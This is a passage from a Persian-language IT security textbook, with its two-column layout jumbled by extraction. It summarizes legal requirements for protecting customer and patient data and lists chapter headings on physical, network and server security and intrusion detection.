ﺩﺳﺘﻜﺎﺭﻱ ،ﻳﺎ ﺣﺬﻑ ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪﺍﺭﺍﻥ.
ﻫﻤﭽﻨــﻴﻦ ﺍﻧﺠــﺎﻡ ﺣﻔﺎﻇــﺖ ﻓﻴﺰﻳﻜــﻲ ﺑــﺮﺍﻱ ﺍﻣﻨﻴــﺖ ﺍﻃﻼﻋــﺎﺕ
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ،ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺍﺟـﺮﺍﻱ ﻣﻲ ﺑﺎﺷﻨﺪ .ﻧﻜﺘﻪ ﻣﻬـﻢ ﺍﻳﻨﺠﺎﺳـﺖ ﻛـﻪ ﺍﻳـﻦ ﺿـﻮﺍﺑﻂ ﻣـﺸﺨﺺ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺁﻣﻮﺯﺵ ﺑﺒﻴﻨﻨﺪ .ﺑﺮﺭﺳﻲ ﻣﻨﻈﻢ ﺍﻳـﻦ ﻛﻨﺘﺮﻟﻬـﺎ، ﻧﻜﺮﺩﻩﺍﻧﺪ ﻛﻪ ﭼﻪ ﺍﺟﺰﺍﻱ ﻓﻨﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ؛ ﻟﺬﺍ
ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎ ﺑﺎﻳﺪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺗﻐﻴﻴﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ،ﺣـﺴﺎﺳﻴﺖ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﻗﺎﻧﻮﻥ ﺗﺼﻤﻴﻢ ﺩﺭ ﻣﻮﺭﺩ ﺍﻗﺪﺍﻣﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺧـﺎﺹ ﺭﺍ
ﺍﻃﻼﻋﺎﺕ ﻣﺸﺘﺮﻳﺎﻥ ،ﺗﻬﺪﻳﺪﺍﺕ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺍﺧﻠـﻲ ﻭ ﺧـﺎﺭﺟﻲ ،ﻭ ﺑﻪ ﺳﺎﺯﻣﺎﻥ ﻭﺍﮔﺬﺍﺭ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﺗﻐﻴﻴﺮ ﺑﺮﻧﺎﻣﻪﺭﻳـﺰﻱ ﻛـﺎﺭﻱ ﺳـﺎﺯﻣﺎﻥ ﻣﺜـﻞ ﺍﺩﻏـﺎﻡ ﻳـﺎ ﺍﺗﺤـﺎﺩ ﺑـﺎ
ﺑﺮ ﻣﺒﻨـﺎﻱ ﺍﻳـﻦ ﻗـﺎﻧﻮﻥ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻣـﺼﻮﺏ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﺳﺎﺯﻣﺎﻧﻲ ﺩﻳﮕﺮ ،ﻭ ﻳﺎ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﻳﺎ ﺷﺮﻛﺘﻬﺎﻱ ﺧـﺎﺭﺝ
ﻗﺎﻧﻮﻧﮕـﺬﺍﺭ ﺑــﺮﺍﻱ ﺻــﻨﺎﻳﻊ ﺧــﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺗﻮﺳــﻂ ﺑﺎﻧﻜﻬــﺎ ﺍﺟــﺮﺍ
ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ .ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﻫﻴﺄﺕ ﻣﺪﻳﺮﺓ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ
ﻣﻲﺷﻮﻧﺪ .ﻗﺎﻧﻮﻥ ،ﺍﻗﺪﺍﻣﺎﺕ ﻓﻨﻲ ﻣﻘﺘﻀﻲ ﺭﺍ ﺗﻌﻴﻴﻦ ﻧﻤﻲ ﻛﻨﺪ ،ﺑﻠﻜﻪ
ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺘﺒﻲ ﺍﻣﻨﻴـﺖ ﺳـﺎﺯﻣﺎﻥ ﺧـﻮﺩ ﺭﺍ
ﻣﻲﮔﻮﻳﺪ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺫﻳﻞ ﺑﺎﺷﺪ:
ﺗﺄﻳﻴﺪ ﻧﻤﺎﻳﻨﺪ ﻭ ﺑﺮ ﻃﺮﺍﺣﻲ ،ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻃـﺮﺡ )ﺷـﺎﻣﻞ
ﻣﺴﺌﻮﻟﻴﺖ ﺍﺟﺮﺍﻱ ﻃﺮﺡ ﻭ ﺑﺮﺭﺳﻲ ﮔﺰﺍﺭﺷـﻬﺎﻱ ﻣـﺪﻳﺮﻳﺘﻲ( ﻧﻈـﺎﺭﺕ ﻛﻨﻨـﺪ. ﻲ ﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨﻲ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟ ﹺ •
ﻗﻮﺍﻧﻴﻦ ﻣﺸﺎﺑﻪ ﻛﻤﻴﺴﻴﻮﻥ ﺗﺠﺎﺭﺕ ﻣﻠﻲ ،ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﺗﺤـﺖ ﺍﻓﺸﺎﺳﺎﺯﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ،ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ،ﺗﻐﻴﻴـﺮ ﻭ ﻳـﺎ ﺍﻧﻬـﺪﺍﻡ
ﻗﻠﻤﺮﻭ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺗﻬﻴﺔ ﻃﺮﺣﻲ ﻭﺍﺩﺍﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﺆﺳﺴﺎﺕ ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪﺍﺭﺍﻥ ﻳﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺧﺮﻳـﺪﺍﺭﺍﻥ
ﺑﺎﻳﺪ: ﺍﺳﺖ ﺭﺍ ﻣﺸﺨﺺ ﺳﺎﺯﺩ.
ﻳﻚ ﻳﺎ ﭼﻨﺪ ﻛﺎﺭﻣﻨﺪ ﺭﺍ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻨﺪ؛ • ﺍﺣﺘﻤﺎﻝ ﻭ ﭘﺘﺎﻧﺴﻴﻞ ﺑﻪ ﻓﻌﻠﻴﺖ ﻧﺮﺳﻴﺪﻥ ﺍﻳﻦ ﺗﻬﺪﻳﺪﻫﺎ ﺭﺍ ﺑـﺎ •
ﺗﻮﺟﻪ ﺑﻪ ﺣﺴﺎﺳﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪﺍﺭﺍﻥ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﺪ.
ﺍﺯ ﻫﺮ ﻛـﺎﺭﺑﺮﺩ ﻭ ﺍﻓـﺸﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﻃﺒـﻖ ﺿـﺎﺑﻄﻪ • ﺩﺭ ﻫﺮ ﺑﺨﺶ ﺍﺯ ﺣﻮﺯﻩﻫﺎﻱ ﻋﻤﻠﻴـﺎﺗﻲ ﺷـﺮﻛﺖ ﻣﺨـﺎﻃﺮﺍﺗﻲ •
ﺍﻣﻨﻴﺘﻲ ﻗﺎﺑﻞ ﺗﻮﺟﻴﻪ ﻧﻴﺴﺖ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻴﺪ؛ ﻭ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳـﺪﺍﺭﺍﻥ ﺭﺍ ﺗﻬﺪﻳـﺪ ﻣـﻲﻛﻨـﺪ ﻣـﺸﺨﺺ ﻭ
ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﻨﺪ ﻭ ﺍﺛﺮﺑﺨﺸﻲ ﺳﻴﺴﺘﻢ ﻛﻨﻮﻧﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺁﻥ
ﺍﺯ ﻫﻤﺎﻫﻨﮕﻲ ﻧﻴﺮﻭﻱ ﻛﺎﺭ ﺑﺎ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘﻲ ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻴﺪ. •
ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻨﺪ؛
ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﻗﺎﺑﻞ ﺍﻧﻌﻄﺎﻑ ﺍﺳﺖ:
ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺣﻔﺎﻇﺘﻲ ﺭﺍ ﻃﺮﺍﺣﻲ ﻭ ﺍﺟﺮﺍ ﻛﻨﻨﺪ ﻭ ﺁﻧـﺮﺍ ﺑﻄـﻮﺭ •
ﻣﺆﺳﺴﺎﺕ ﻣﺸﻤﻮﻝ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ • ﻣﻨﻈﻢ ﻣﻮﺭﺩ ﺁﺯﻣﺎﻳﺶ ﻭ ﺍﺻﻼﺡ ﻗﺮﺍﺭ ﺩﻫﻨﺪ؛
ﻛﻨﻨــﺪ ﺗــﺎ ﺑﻄــﻮﺭ ﻣﻨﻄﻘــﻲ ﻭ ﻣﻨﺎﺳــﺐ ﺍﻳــﻦ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍ
ﺍﺭﺍﺋﻪ ﻛﻨﻨﺪﮔﺎﻥ ﻣﻨﺎﺳﺐ ﺧﺪﻣﺎﺕ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻭ ﺑﺎ ﺁﻧﻬـﺎ ﺑـﺮﺍﻱ •
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻤﺎﻳﻨﺪ؛
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺒﻨﺪﻧﺪ؛ ﻭ
ﺩﺭ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻨﻜﻪ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣـﻮﺭﺩ •
ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﺭﺍ ﺩﺭ ﺷﺮﺍﻳﻂ ﻭﺍﻗﻌﻲ )ﻣﺜﻞ ﺗﻐﻴﻴﺮ ﺳـﺎﺧﺘﺎﺭ ﻳـﺎ ﻋﻤﻠﻴـﺎﺕ •
ﺍﺳﺘﻔﺎﺩﻩ ﭼﻪ ﺑﺎﺷﻨﺪ ،ﺑﺎﻳﺪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ:
ﺳﺎﺯﻣﺎﻥ( ﺍﺭﺯﻳـﺎﺑﻲ ﻭ ﺍﺻـﻼﺡ ﻛﻨﻨـﺪ ﻭ ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﻧﺘـﺎﻳﺞ
oﺍﻧﺪﺍﺯﻩ ،ﭘﻴﭽﻴﺪﮔﻲ ،ﻭ ﮔﺴﺘﺮﺓ ﺁﻥ؛
oﺯﻳﺮﺳﺎﺧﺖ ﻓﻨﻲ ،ﺳـﺨﺖ ﺍﻓـﺰﺍﺭ ،ﻭ ﻗﺎﺑﻠﻴـﺖ ﺍﻣﻨﻴﺘـﻲ ﺁﺯﻣﺎﻳﺶ ،ﻓﺮﺁﻳﻨﺪ ﻧﻈﺎﺭﺕ ﺭﺍ ﻧﻴﺰ ﺍﺭﺯﻳﺎﺑﻲ ﻭ ﺍﺻﻼﺡ ﻧﻤﺎﻳﻨﺪ.
ﻧﺮﻡﺍﻓﺰﺍﺭ؛ ﺭﻭﻳﻜﺮﺩ ﻣﺸﺎﺑﻬﻲ ﺩﺭ ﻗـﺎﻧﻮﻥ ﻣـﺴﺌﻮﻟﻴﺖ ﺑﻴﻤـﺔ ﺧـﺪﻣﺎﺕ ﺩﺭﻣـﺎﻧﻲ
oﻫﺰﻳﻨﺔ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ؛ ﻭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ٩٨ﺑﻪ ﭼﺸﻢ ﻣـﻲ ﺧـﻮﺭﺩ ﻛـﻪ ﻣﺆﺳـﺴﺎﺕ ﺧـﺪﻣﺎﺕ
oﺍﺣﺘﻤﺎﻝ ﻭ ﺣﺴﺎﺳﻴﺖ ﻫﺮﻳﻚ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ. ﺑﻬﺪﺍﺷﺘﻲ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ
ﻛﻨﻨﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻧﺪ ﺍﻃﻼﻋﺎﺕ ﺑﻴﻤﺎﺭ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮ ﺷﺮﻛﺘﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﻄﻮﺭ ﻋﻤﻮﻣﻲ ،ﺿﻌﻔﻬﺎ
ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﻫﻤـﻮﺍﺭﻩ ﻣﺤﺮﻣﺎﻧـﻪ ﻭ ﺩﻭﺭ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻗـﺎﻧﻮﻧﻲ
ﻭ ﻋﻴﻮﺏ ﺭﺍ ﺑـﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ ﻋﻤﻠﻜـﺮﺩ ﺳﻴـﺴﺘﻢ ﻭ ﺍﺭﺗﻘـﺎﻱ ﺳـﻄﺢ
ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﺪ .ﻃﺒﻖ ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﻣﺆﺳـﺴﺎﺕ ﻣﻠـﺰﻡ ﺑـﻪ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﺍﻣﻨﻴﺖ ،ﻣﻨﺘﺸﺮ ﺳـﺎﺯﻧﺪ .ﻗـﻮﺍﻧﻴﻦ ﺍﺗﺤﺎﺩﻳـﺔ ﺍﺭﻭﭘـﺎ ﺍﺭﺍﺋـﻪ ﻛﻨﻨـﺪﮔﺎﻥ
ﻣﻨﺎﺳﺐ ﻭ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍﻫﺒﺮﻱ ،ﻓﻴﺰﻳﻜﻲ ﻭ ﻓﻨﻲ ﻫﺴﺘﻨﺪ
ﺧﺪﻣﺎﺕ ﻣﺨﺎﺑﺮﺍﺗﻲ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﺸﺘﺮﻛﺎﻥ ﺭﺍ ﺍﺯ ﺧﻄﺮﺍﺗـﻲ
ﺗﺎ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﭘﺮﻭﻧﺪﻩﻫﺎﻱ ﭘﺰﺷـﻜﻲ ﺍﺷـﺨﺎﺹ ﺩﺭ
ﻛﻪ ﺑﻮﺍﺳﻄﺔ ﺗﺨﻠﻒ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺷﺒﻜﻪ ﺁﻧﻬﺎ ﺭﺍ ﺗﻬﺪﻳـﺪ ﻣـﻲﻛﻨـﺪ )ﻭ
ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﭘﻴﺶ ﺑﻴﻨﻲﺷـﺪﻩ ﻭ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠـﺎﺯ
ﻫﻤﭽﻨﻴﻦ ﻫﺰﻳﻨﺔ ﺍﺣﺘﻤﺎﻟﻲ ﺁﻥ( ﺁﮔﺎﻩ ﻧﻤﺎﻳﻨﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺩﺭ ﺟـﻮﻻﻱ
ﺣﻔﻆ ﺷﻮﻧﺪ .ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺑﺮﺍﻱ ﺫﺧﻴـﺮﻩ ﻭ ﺍﻧﺘﻘـﺎﻝ ﺩﺍﺩﻩﻫـﺎ ﺍﻋﻤـﺎﻝ
۲۰۰۳ﺩﺭ ﺍﻳﺎﻟﺖ ﻛﺎﻟﻴﻔﺮﻧﻴﺎ ﻗﺎﻧﻮﻧﻲ ﺗﺼﻮﻳﺐ ﺷﺪ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﻫـﺮ
ﻣﻲﺷﻮﺩ ﻭ ﺩﺍﺭﺍﻱ ۲۸ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻭ ۴۱ﺷﺮﺡ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺍﺳـﺖ.
ﺷﺮﻛﺘﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺳﺎﻛﻨﺎﻥ ﻛﺎﻟﻴﻔﺮﻧﻴـﺎ ﺭﺍ ﻧﮕﻬـﺪﺍﺭﻱ
ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ ﻛﻪ ﻓﺮﺁﻳﻨﺪﻫﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑﺎﻳـﺪ
ﻣﻲﻛﻨﺪ ،ﻣﻮﻇﻒ ﺑﻪ ﺁﮔﺎﻩ ﺳـﺎﺧﺘﻦ ﺁﻧـﺎﻥ ﺍﺯ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﺣﺘﻤـﺎﻟﻲ
ﺑﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻓﻨﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺛﺒﺖ ،ﻫﺰﻳﻨـﺔ ﺍﻗـﺪﺍﻣﺎﺕ ﺍﻣﻨﻴﺘـﻲ،
ﺣﺎﺻﻞ ﺍﺯ ﻧﻘﺾ ﺍﻣﻨﻴﺖ ﻭ ﻣﺘﻌﺎﻗﺒﹰﺎ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻗـﺎﻧﻮﻧﻲ ﺑـﻪ ﺁﻥ
ﻧﻴﺎﺯ ﺁﻣﻮﺯﺷﻲ ﻛﺎﺭﻛﻨﺎﻥ ،ﻭ ﺍﺭﺯﺵ ﺑﺮﺭﺳﻲ ﺩﻧﺒﺎﻟﻪﻫﺎﻱ ﺭﺩﮔﻴـﺮﻱ ﺩﺭ
ﺍﻃﻼﻋﺎﺕ ﻣﻲﺑﺎﺷﺪ.
ﻣﺤﻴﻄﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺭﺍ ﺩﺭﻧﻈﺮ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ .ﻗـﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘـﻲ،
ﻋﻤﻠﻴﺎﺕ ﺣﻔﺎﻇﺘﻲ ﻛﻪ "ﻻﺯﻡ" ﻭ "ﻗﺎﺑﻞ ﺗﻮﺟﻪ" ﻫﺴﺘﻨﺪ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ
ﻣﻲ ﻛﻨﻨﺪ .ﻧﻜﺎﺕ ﺍﺻﻠﻲ ﻗـﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘـﻲ ﻛـﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﺗﻮﺟـﻪ
ﻣﺆﺳﺴﺎﺕ ﻭﺍﻗﻊ ﺷﻮﻧﺪ ،ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﺍﺯ ﻣﺤﺮﻣﺎﻧﮕﻲ ،ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺍﻃﻼﻋﺎﺗﻲ •
ﻛﻪ ﺗﻮﺳﻂ ﻣﺆﺳﺴﻪ ﺍﻳﺠﺎﺩ ،ﺩﺭﻳﺎﻓﺖ ،ﻧﮕﻬـﺪﺍﺭﻱ ﻳـﺎ ﺍﻧﺘﻘـﺎﻝ
ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺣﺼﻮﻝ ﺍﻃﻤﻴﻨﺎﻥ ﻛﻨﻴﺪ؛
ﺍﺯ ﺳﻴﺴﺘﻢ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﺍﻣﻨﻴﺖ ﻳـﺎ ﻳﻜﭙـﺎﺭﭼﮕﻲ •
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﻪ ﺧﻄﺮ ﻣﻲﺍﻧﺪﺍﺯﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ؛
ﻓﺼﻞ .۱ﻣﻘﺪﻣﻪ
ﻓﺼﻞ .۲ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺭﺍﻫﱪﺍﻥ
ﻓﺼﻞ .۳ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ
ﻓﺼﻞ .۴ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ
ﻓﺼﻞ .۵ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ
ﻓﺼﻞ .۶ﺍﻣﻨﻴﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ
ﻓﺼﻞ .۷ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ
ﻓﺼﻞ .۸ﺍﻧﻮﺍﻉ ﲪﻼﺕ ﻭ ﺭﻭﺵﻫﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﺎ
ﻓﺼﻞ .۹ﻛﺸﻒ ﻭﻣﺪﻳﺮﻳﺖ ﻧﻔﻮﺫ
ﻓﺼﻞ .۱۰ﻧﻜﺎﺕ ﻭﻳﮋﻩ ﺑﺴﺘﺮﻫﺎﻱ ﳐﺘﻠﻒ
٢٥٧ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻓﺼﻞ ﺍﻭﻝ
ﻣﻘﺪﻣﻪ
ﺧﻼﺻﻪ ﺑﺨﺸﻬﺎﻱ ۱ﺗﺎ ۴
ﺣﺎﻝ ﻛﻪ ﺑﻪ ﻓﻨﻲﺗﺮﻳﻦ ﻛﺘﺎﺏ ﺭﺳﻴﺪﻩﺍﻳﻢ ،ﻣﺮﻭﺭﻱ ﺑﺮ ﺁﻧﭽﻪ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ۱ﺗﺎ ۴ﺩﺭﺑﺎﺭﺓ ﺁﻥ ﺑﺤﺚ ﺷﺪ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺑﻪ ﻳﺎﺩ ﻣﻲﺁﻭﺭﻳﻢ ﻛﻪ:
ﺑﺨﺶ ۱ﻛﺘﺎﺏ ﻳﻚ ﻣﻌﺮﻓﻲ ﺍﺟﻤﺎﻟﻲ ﺍﺯ ﻣﺴﺎﺋﻞ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ ﺍﺭﺍﺋﻪ ﻛﺮﺩ .ﺍﻳﻦ ﺑﺨﺶ ﮔﺴﺘﺮﺓ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺖ ITﻭ ﺑﺮﺧـﻲ
ﺍﻋﻤﺎﻝ ﺗﺨﺎﺻﻢﺁﻣﻴﺰ ﺩﺭ ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺭﺍ ﺷﺮﺡ ﺩﺍﺩ ،ﻭ ﻣﺸﺨﺺ ﻛﺮﺩ ﻛﻪ ﭼـﺮﺍ ﺧـﻂ ﻣـﺸﻲﻫـﺎ ﻭ ﺩﺍﻧـﺶ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩ،
ﻣﺆﺳﺴﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ ،ﻳﺎ ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺿﺮﻭﺭﻱ ﺍﺳﺖ.
ﺑﺨﺶ ۲ﺑﻪ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﻋﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﺷﺨﺼﻲ ،ﻣﻨﺎﺑﻊ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺷﺒﻜﻪ ﺍﺷﺎﺭﻩ ﺩﺍﺷﺖ .ﺍﻳﻦ ﺑﺨﺶ ﻣﺴﺎﺋﻞ ﻛﻠﻴﺪﻱ ﺍﻣﻨﻴﺖ ﺍﻧﻔﺮﺍﺩﻱ ﺭﺍ ﺩﺭ ﺑﺮ
ﮔﺮﻓﺖ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻳﻲ ﻓﻨﻲ ﺍﺭﺍﺋﻪ ﺩﺍﺩ ﻛﻪ ﺍﮔﺮ ﺩﺭﺳﺖ ﺑﻜﺎﺭ ﺭﻭﻧﺪ ،ﺗﻬﺪﻳﺪ ﻧﻔﻮﺫ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﻣﻲﺭﺳﺎﻧﻨﺪ.
ﺑﺨﺶ ۳ﺟﻮﺍﻧﺐ ﺭﺍﻫﺒﺮﻱ ﻭ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺳﺎﺯﻣﺎﻧﻲ ﭘﻮﺷﺶ ﺩﺍﺩ .ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﮔﻔﺘﻴﻢ ﺑﺎ ﻓﺮﺻﺘﻬﺎﻳﻲ ﻛﻪ ﺭﺳـﺎﻧﻪﻫـﺎﻱ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺟﺪﻳﺪ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﻨﺪ ،ﺑﻨﮕﺎﻫﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ )SMEﻫﺎ( ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺑـﻪ ﻃـﺮﻑ ﻧﻘﻄـﻪﺍﻱ
